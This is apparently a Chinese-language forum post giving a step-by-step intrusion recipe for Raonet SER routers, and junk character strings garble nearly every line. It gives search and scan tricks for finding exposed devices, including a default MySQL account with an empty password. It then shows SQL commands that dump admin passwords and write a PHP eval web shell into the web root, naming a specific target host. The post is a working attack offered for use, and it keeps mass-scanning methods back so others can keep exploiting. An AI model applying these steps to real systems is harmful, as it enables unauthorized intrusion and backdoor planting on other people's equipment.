寻找存在漏洞的路由器方法:
1 J+ T; x# F+ A
) O; l4 k' ~6 D1:google搜索'Raonet Subscriber Ethernet Router'# p4 y* G. e7 v/ a8 }7 w8 D; L
1 J i9 e8 E" Y0 W
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20015 E0 h% T/ p! J* Z
1 W. W! \& Z3 g! ]- h* x2 d3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。" g/ Y1 @ x" r5 Z- V) g
- z1 _1 z( l8 v//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
. s" @$ u' k j# k7 W5 F
U$ l4 {0 ^4 _: I% j6 X 3 A- H5 L) T; k) i2 a* x
. k# m2 A, Z7 h/ R6 K入侵步骤:- U9 {( p7 ^' k# C3 p
% V- t" `. n& H. N2 d! r1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
. P3 v9 @# R/ f9 ~
! p0 A2 y' X! r+ E2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc( i0 f6 V: l. ?; w7 Q$ s
3:得到密码后连接,查看GUI管理密码:) x3 O5 ]5 \. p
use ser_500
# B/ E. | G6 y) m; Q3 [( ?7 eselect id,passwd from user;
, c- U4 ?' t5 w4:通过数据库写入webshell,执行命令: h8 q& R5 E( q. d
use mysql;# z- \: O3 J# o; Q! q
create table ok(cmd TEXT);
4 v1 ~: U; o& L8 B G" Q7 jinsert into ok values("<?php @eval($_POST[cmd])?>");
6 a' L( ?- p+ i3 s$ u% F3 {! S' `select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";* r& R* h3 s* U f/ G' t Z' H
drop table ok;
0 G% t. |8 _$ q* J: @% y" f# H7 Q( E" z2 F8 H" e' J
5:连接后门shell.php 2 B; c0 @/ D8 j9 \- I( D8 ^
) M* `8 J6 O2 b
6. 搞定!; _+ v+ o. ~2 @
; g8 p$ ?; t7 M! N- x: D' n |